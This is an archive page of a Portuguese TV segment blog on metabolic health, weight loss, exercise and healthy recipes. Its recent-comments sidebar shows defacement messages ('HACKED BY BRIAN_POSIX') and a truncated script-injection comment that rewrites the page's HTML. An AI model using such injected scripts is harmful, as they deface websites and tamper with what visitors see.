Saúde Metabólica @ 18:40

Seg, 30/01/12

O nosso organismo armazena a energia sobre a forma de gordura corporal de forma a poder ser utilizada quando é necessária. No entanto, por vezes, a gordura é armazenada em regiões do nosso corpo que nos fazem ficar doentes, ou seja, para além do tecido gordo, o nosso corpo armazena gordura nas artérias, coração, fígado e músculos entre outros órgãos. Esta deposição de gordura não é benéfica, causa doença e por vezes a morte.  Apesar de existir alguma predisposição genética, o estilo de vida também contribui para este armazenamento prejudicial de gordura.

Na rubrica Saúde Metabólica iremos perceber como ficam os nossos órgãos quando estão gordos e quais os alimentos e comportamentos que aumentam a deposição de gordura nessas regiões prejudicando o bom funcionamento do nosso organismo.





Tags:


Saúde Metabólica @ 19:27

Seg, 16/01/12

Reduzir o perímetro da cintura é um dos objectivos estéticos prioritários da maioria das pessoas que praticam exercício físico para melhorias estéticas e de saúde. Ter uma cintura mais estreita implica ter uma faixa abdominal eficiente, que consiga sustentar os órgãos internos e que proporcione um eficaz suporte à coluna. A maioria das pessoas associa uma barriga plana aos abdominais tradicionais e mesmo os isométricos ou pranchas, mas será assim?

O Método Hipopressivo tem a sua origem no Doutor Marcel Caufriez, um fisioterapeuta belga que trabalha desde sempre com mulheres com problemas do pavimento pélvico e descobriu que os abdominais tradicionais pioravam ainda mais problemas como a incontinência urinária, os prolapsos ou o desconforto sexual.

Assim, desenvolveu-se a Ginástica Abdominal Hipopressiva aplicada por diferentes profissionais da saúde e que mais tarde seria adaptado ao mundo do Fitness pelo especialista Piti Pinsach e lhe dariam o nome de Reprocessing Soft Fitness (RSF®). O Método Hipopressivo procura reforçar a faixa abdominal aumentando a sua tonicidade em repouso, de forma reflexa e sem criar pressão.



 


Tags:


Saúde Metabólica @ 19:32

Seg, 02/01/12

Se é uma daquelas pessoas que tem muita dificuldade em resistir às iguarias no Natal e por isso o ponteiro da balança rodou para a direita, esta sessão de hoje é para si.

Na rubrica Saúde Metabólica iremos apresentar um plano de ataque para perder os 2kg que ganhou no Natal e na Passagem do Ano. Antes de mais pese-se, registe o peso e o perímetro da sua cintura. Inicie o plano alimentar que lhe propomos que inclui 7 refeições ricas essencialmente em proteína e gordura. Os frutos secos, e o chocolate negro são também permitidos. Para além do plano alimentar iremos apresentar-lhe um programa de exercício acessível e fácil de conciliar com a sua vida muito ocupada.



Tags:


Saúde Metabólica @ 18:32

Seg, 12/12/11

Este Natal opte por alternativas alimentares saudáveis sem fugir a tradição. Os frutos secos, o chocolate negro com mais 70 por cento de cacau, a fruta fresca, a gelatina, o iogurte podem ser ingredientes que nos permitem fazer sobremesas mais saudáveis e igualmente saborosas. 

O Chef Bernhard Pfister do hotel palácio no estoril, ajudou-nos a criar as alternativas que lhe vamos sugerir na rubrica saúde metabólica do mais mulher. Para alem destas alternativas, sugerimos-lhe também que opte por criar miniaturas das doçarias tradicionais de Natal, desta forma terá possibilidade de ingerir os alimentos que mais gosta sem consumir muitas calorias. 

Porque não, rabanadas, sonhos e filhos miniatura? Todos apreciarão a sua originalidade. 



Tags:


Saúde Metabólica @ 18:31

Seg, 28/11/11

Uma alimentação saudável não tem que ser monótona e pouco saborosa. Para que se consiga ter uma  boa gestão do peso é necessário apostar em alimentos variados e apelativos para que não tenhamos a noção de que estamos permanentemente em dieta. Os melhores snacks para ter uma boa gestão do peso, são ricos em proteína e gordura saudável.

Assim, este tipo de snacks são mais saciantes e nutritivos, levando a que a ingestão nas refeições seguintes seja moderada, como é aconselhado. Exemplos como: um ovo cozido, 1 fatia de presunto com espargos, um copo de gaspacho, 1 prato de sopa, 1 batido proteico ou 1 queijo fresco com frutos secos, são óptimas alternativas para os nossos lanchinhos diários.  Em momentos de stresse, de viagem ou de imprevisto aproveite estes snacks para se manter alimentada ao longo do seu dia.

Esta semana na rubrica saúde metabólica serão apresentados vários tipos de sancks, de fácil confecção, económicos e saborosos que a ajudarão a manter um peso saudável.


Tags:


Saúde Metabólica @ 18:32

Seg, 14/11/11

A obesidade é considerada uma doença crónica que em casos de obesidade severa só é controlada por recurso a cirurgia. No entanto, o Professor Albino Maia, médico psiquiatra e investigador na fundação Champalimaud, publicou recentemente um artigo, com dados resultantes do seu trabalho de investigação com roedores, que existe uma espécie de sensor na região abdominal (veia-porta) que permite controlar a quantidade de açúcar (glicose) que chega ao cérebro.

Este trabalho permitiu perceber que, injectando açúcar na região abdominal dos roedores, estes libertavam mais dopamina, que é considerada a substância do prazer. O investigador percebeu também que, se o açúcar fosse injectado na região do pescoço (veia jugular) a quantidade de dopamina libertada no cérebro era inferior. Segundo o investigador, este achado permite conhecer o mecanismo pelo qual poderá vir a ser possível influenciar o estímulo cerebral que o açúcar promove e assim poder evitar a sensação de prazer que este alimento proporciona e que potencia a obesidade. O estudo realizado pelo Professor Albino Maia vem reforçar a mensagem de que a obesidade não é uma questão de opção pessoal, mas sim a consequência de múltiplos factores, que não dependem exclusivamente do doente obeso e da sua força de vontade.


Tags:


Saúde Metabólica @ 18:18

Seg, 31/10/11

Curiosamente, todos pensam que o Filipe, irá conseguir controlar o seu peso através de uma dieta especial e de longas horas de esforço físico no ginásio. Não acredito nisso. Acredito que o Filipe conseguirá controlar o seu peso, para o resto da vida, se tiver condições físicas, psicológicas, emocionais, financeiras, entre outras, para o fazer.

 

Acredito que acima de tudo, o Filipe deverá ter um projecto de vida que o ajude a sentir-se realizado profissionalmente e pessoalmente. O programa PESO PESADO, mais do que um programa de emagrecimento, foi um pontapé de saída para uma nova vida. E é isso que o Filipe está a fazer, a agarrar a oportunidade que lhe foi concedida como se fosse a última. Prova disso é a criação de uma associação com o nome: Movimento Contra a Obesidade, Mco.

 

O primeiro evento está já agendado para Novembro (12 e 13) através de uma Maratona de BTT e de outras actividades como a culinária e workshops de alimentação saudável. Esse evento pretende juntar todos os ex-concorrentes do programa PESO PESADO e conta já com o apoio de algumas marcas que se quiseram associar ao evento. Filipe tem o total apoio da câmara de Beja e é uma pessoa querida na sua cidade. Esse evento desportivo contará ainda com a presença de algumas figuras ilustres do panorama desportivo português. Qualquer um de nós poderá estar presente neste evento ajudando o Filipe a construir o seu projecto de vida que passa por dinamizar a sua terra natal.

VAMOS PEDALAR COM O FILIPE EM BEJA…

 

Visite www.apmco.pt e faça a sua inscrição.


Tags:


Saúde Metabólica @ 18:16

Ter, 04/10/11

Apesar de as pessoas com excesso de peso ou obesas terem maior probabilidade de desenvolver factores de risco, nem todas as pessoas com excesso de peso estão em perigo e nem todas as pessoas magras estão salvaguardadas.

 

Assim sendo, é frequente encontrarmos pessoas com excesso de peso cujos valores de colesterol total, triglicéridos, bom colesterol, mau colesterol, glicemia e insulinémia se encontram perfeitamente dentro de valores normais.

 

Não sendo vulgar, também existem pessoas que apesar de não terem excesso de peso acumulam factores de risco, ou seja, tem valores elevados de mau colesterol e colesterol total, tem valores reduzidos de bom colesterol, apresentam valores elevados de triglicéridos entre outros parâmetros.

 

Por estas razões por um lado não devemos estigmatizar o gordinho dizendo-lhe que ele deve emagrecer pois caso contrário poderá sofrer de alguma doença e por outro lado os magrinhos devem cuidar da sua saúde independentemente do peso.

 

 

Recebemos Teresa Branco e Susana Henriques (ex-concorrente 1ªedição Peso Pesado), para lhe explicar tudo sobre este tem.

 


Tags:


Saúde Metabólica @ 18:16

Ter, 20/09/11

Tradicionalmente o aconselhamento alimentar traduz-se numa promoção de melhores escolhas nutricionais.

 

No entanto, apesar destes esforços os níveis de obesidade e excesso de peso continuam a aumentar, demonstrando que este aconselhamento nutricional, principalmente a longo prazo, tem um sucesso limitado.

 

Com base neste pressuposto têm sido feitos estudos que favorecem o entendimento do complexo sistema de interacção entre o consumo de alimentos em excesso e o nosso cérebro.

 


Tags:


Saúde Metabólica @ 19:08

Ter, 19/07/11


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO